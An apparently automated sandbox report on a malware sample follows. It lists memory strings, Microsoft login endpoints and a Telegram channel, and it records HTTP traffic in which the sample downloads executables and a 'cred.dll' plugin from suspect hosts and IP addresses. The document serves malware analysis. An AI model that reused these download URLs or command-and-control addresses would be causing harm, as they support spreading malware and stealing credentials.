                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                          Source: svchost.exe, 0000001D.00000003.492566066.0000019DDF72E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603ie
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603Key0
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpx4
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inlonnect.s
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf.srf
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srfwork
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/retention.srf
                          Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf256
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                          Source: A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: A7F0.exe, 0000001F.00000002.663878088.0000000005215000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://t.me/capibar
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                          Source: A7F0.exe, 0000001F.00000002.650359326.0000000002F2A000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0)
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: unknown - DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe - Code function: 8_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic - HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET /install5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: unicupload.top
Source: global traffic - HTTP traffic detected: GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET /6.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.7.214.171:8080
Source: global traffic - HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET /9.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: a0621298.xsph.ru
Source: global traffic - HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 Host: 185.215.113.35
Source: global traffic - HTTP traffic detected: GET /capibar HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: 185.163.204.22
Source: global traffic - HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.24
Source: global traffic - HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Source: global traffic - HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.24
Source: global traffic - HTTP traffic detected: GET /7.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: a0621298.xsph.ru
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown - Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown - Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown - Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49778
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 14 Jan 2022 09:43:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:42:29 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
